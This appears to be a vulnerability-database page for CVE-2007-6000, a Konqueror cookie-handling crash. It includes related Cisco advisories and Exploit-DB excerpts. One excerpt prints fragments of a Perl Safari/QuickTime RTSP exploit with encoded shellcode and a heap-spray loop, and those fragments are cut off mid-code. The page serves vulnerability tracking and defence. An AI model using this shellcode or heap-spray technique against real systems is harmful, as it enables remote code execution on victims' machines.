CVE-2007-6000
published 2007-11-15CVE-2007-6000: KDE Konqueror 3.5.6 and earlier allows remote attackers to cause a denial of service (crash) via large HTTP cookie parameters.
PriorityP421medium5CVSS 2.0
AVNACLAuNCNINAP
EXPLOIT
EPSS
3.34%
87.1th percentile
KDE Konqueror 3.5.6 and earlier allows remote attackers to cause a denial of service (crash) via large HTTP cookie parameters.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| kde | konqueror | <= 3.5.6 | — |
CVSS provenance
nvdv2.05.0MEDIUMAV:N/AC:L/Au:N/C:N/I:N/A:P
vendor_cisco10.0CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-5gw9-4f37-rxx8: KDE Konqueror 3
ghsa_unreviewed·2022-05-01
CVE-2007-6000 [MEDIUM] GHSA-5gw9-4f37-rxx8: KDE Konqueror 3
KDE Konqueror 3.5.6 and earlier allows remote attackers to cause a denial of service (crash) via large HTTP cookie parameters.
Cisco
Cisco Catalyst 6000, 6500 and Cisco 7600 Series MPLS Packet Vulnerability
vendor_cisco·2007-02-28·CVSS 3.3
CVE-2007-1258 [LOW] CWE-399 Cisco Catalyst 6000, 6500 and Cisco 7600 Series MPLS Packet Vulnerability
Cisco Catalyst 6000, 6500 and Cisco 7600 Series MPLS Packet Vulnerability
Cisco Catalyst 6500 series systems that are running certain versions of Cisco Internetwork Operating System (IOS) are vulnerable to an attack from a Multi Protocol Label Switching (MPLS) packet. Only the systems that are running in Hybrid Mode (Catalyst OS (CatOS) software on the Supervisor Engine and IOS Software on the Multilayer Switch Feature Card (MSFC)) or running with Cisco IOS Software Modularity are affected.
MPLS packets can only be sent from the local network segment.
This advisory is posted at https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20070228-mpls.
Cisco
Cisco Catalyst 6000, 6500 Series and Cisco 7600 Series NAM (Network Analysis Module) Vulnerability
vendor_cisco·2007-02-28·CVSS 10.0
CVE-2007-1257 [CRITICAL] Cisco Catalyst 6000, 6500 Series and Cisco 7600 Series NAM (Network Analysis Module) Vulnerability
Cisco Catalyst 6000, 6500 Series and Cisco 7600 Series NAM (Network Analysis Module) Vulnerability
Cisco Catalyst 6000, 6500 series and Cisco 7600 series that have a
Network Analysis Module installed are vulnerable to an attack, which could
allow an attacker to gain complete control of the system. Only Cisco Catalyst
systems that have a NAM on them are affected. This vulnerability affects
systems that run Internetwork Operating System (IOS) or Catalyst Operating
System (CatOS).
Cisco has made free software available to address this vulnerability
for affected customers.
This advisory is posted at
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20070228-nam.
Cisco
Cisco Catalyst 6000, 6500 and Cisco 7600 Series MPLS Packet Vulnerability
vendor_cisco
CVE-2007-1258 Cisco Catalyst 6000, 6500 and Cisco 7600 Series MPLS Packet Vulnerability
CVE-2007-1258: Cisco Catalyst 6000, 6500 and Cisco 7600 Series MPLS Packet Vulnerability
Cisco Catalyst 6500 series systems that are running certain versions of Cisco Internetwork Operating System (IOS) are vulnerable to an attack from a Multi Protocol Label Switching (MPLS) packet. Only the systems that are running in Hybrid Mode (Catalyst OS (CatOS) software on the Supervisor Engine and IOS Software on the Multilayer Switch Feature Card (MSFC)) or running with Cisco IOS Software Modularity are affected. MPLS packets can only be sent from the local network segment. This advisory is posted at https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20070228-mpls .
CWE: CWE-399, CWE-399
Bug IDs: CSCef90002, CSCsd37415, CSCef90002
Cisco
Cisco Catalyst 6000, 6500 Series and Cisco 7600 Series NAM (Network Analysis Module) Vulnerability
vendor_cisco
CVE-2007-1257 Cisco Catalyst 6000, 6500 Series and Cisco 7600 Series NAM (Network Analysis Module) Vulnerability
CVE-2007-1257: Cisco Catalyst 6000, 6500 Series and Cisco 7600 Series NAM (Network Analysis Module) Vulnerability
Cisco Catalyst 6000, 6500 series and Cisco 7600 series that have a Network Analysis Module installed are vulnerable to an attack, which could allow an attacker to gain complete control of the system. Only Cisco Catalyst systems that have a NAM on them are affected. This vulnerability affects systems that run Internetwork Operating System (IOS) or Catalyst Operating System (CatOS). Cisco has made free software available to address this vulnerability for affected customers. This advisory is posted at https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20070228-nam .
Bug IDs: CSCsd75273, CSCse52951, CSCsd75273, CSCse52951, CSCse39848
No detection rules found.
Exploit-DB
Apple Safari / QuickTime 7.3 - RTSP Content-Type Remote Buffer Overflow
exploitdb·2008-07-06
CVE-2007-6166 Apple Safari / QuickTime 7.3 - RTSP Content-Type Remote Buffer Overflow
Apple Safari / QuickTime 7.3 - RTSP Content-Type Remote Buffer Overflow
---
#!/usr/bin/perl
#
# quickbite.pl
#
# Safari + Quicktime 8080;
$shellcode = "%uc031%u6850%u02ff%u5c11%ue789%u6a50%u6a01%u6a02%ub010%ucd61%u5780%u5050%u686a%ucd58%u8980%uec47%u6ab0%u80cd%u1eb0%u80cd%u5050%u5a6a%ucd58%uff80%ue44f%uf679%u6850%u2f2f%u6873%u2f68%u6962%u896e%u50e3%u5454%u5053%u3bb0%u80cd";
$buf = chr(0x11) x 6000;
# don't touch anything below this line
$html =
var prefix = unescape("%u3166%uB0C0%uCD42%uFE80%u3CC0%u7501%uB004%uCD01%u9080");
var shellcode = unescape("$shellcode");
shellcode = prefix + shellcode;
var spray = unescape("%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090");
do {
spray += spray;
} while(spray.length ");
ENDHTML
$rtsp_body =
"v=0\r\n" .
"o=- 16689332712 1 IN IP4 0.0.0.0\r\n"
Exploit-DB
KDE Konqueror 3.5.6 - Cookie Handling Denial of Service
exploitdb·2007-11-14
CVE-2007-6000 KDE Konqueror 3.5.6 - Cookie Handling Denial of Service
KDE Konqueror 3.5.6 - Cookie Handling Denial of Service
---
source: https://www.securityfocus.com/bid/26435/info
KDE Konqueror is prone to a remote denial-of-service vulnerability because it fails to handle overly large cookies.
An attacker may exploit this vulnerability to cause Konqueror to crash, resulting in denial-of-service conditions.
Konqueror 3.5.6 is vulnerable; other versions may also be affected.
Exploit-DB
Microsoft Windows XP/Vista - Animated Cursor '.ani' Remote Overflow
exploitdb·2007-04-01
CVE-2007-1765 Microsoft Windows XP/Vista - Animated Cursor '.ani' Remote Overflow
Microsoft Windows XP/Vista - Animated Cursor '.ani' Remote Overflow
---
..::[ jamikazu presents ]::..
Windows Animated Cursor Handling Exploit (0day)
Works on fully patched Windows Vista
I think it is first real remote code execution exploit on vista =)
Tested on:
Windows Vista Enterprise Version 6.0 (Build 6000) (default installation and UAC enabled)
Windows Vista Ultimate Version 6.0 (Build 6000) (default installation and UAC enabled)
Windows XP SP2
(It also must to work on all nt based windows but not tested)
Author: jamikazu
Mail: [email protected]
Bug discovered by determina (http://www.determina.com)
Credit: milw0rm,metasploit, SkyLined, http://doctus.net/
invokes calc.exe if successful
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/3634.
Exploit-DB
Microsoft Windows - Animated Cursor '.ani' Remote (eeye patch Bypass)
exploitdb·2007-04-01
CVE-2007-1765 Microsoft Windows - Animated Cursor '.ani' Remote (eeye patch Bypass)
Microsoft Windows - Animated Cursor '.ani' Remote (eeye patch Bypass)
---
..::[ jamikazu presents ]::..
Windows Animated Cursor Handling Exploit (0day) (Version3)
Works on fully patched Windows Vista
I think it is first real remote code execution exploit on vista =)
Tested on:
Windows Vista Enterprise Version 6.0 (Build 6000) (default installation and UAC enabled)
Windows Vista Ultimate Version 6.0 (Build 6000) (default installation and UAC enabled)
Windows XP SP2
(It also must to work on all nt based windows but not tested)
Update: It also bypass eeye security ani patch!
Author: jamikazu
Mail: [email protected]
Bug discovered by determina (http://www.determina.com)
Credit: milw0rm,metasploit, SkyLined, http://doctus.net/
invokes calc.exe if successful
https://gitlab.com/exploi
No writeups or analysis indexed.
http://securityreason.com/securityalert/3370http://www.securityfocus.com/archive/1/483705/100/0/threadedhttp://www.securityfocus.com/bid/26435https://exchange.xforce.ibmcloud.com/vulnerabilities/38456http://securityreason.com/securityalert/3370http://www.securityfocus.com/archive/1/483705/100/0/threadedhttp://www.securityfocus.com/bid/26435https://exchange.xforce.ibmcloud.com/vulnerabilities/38456
2007-11-15
Published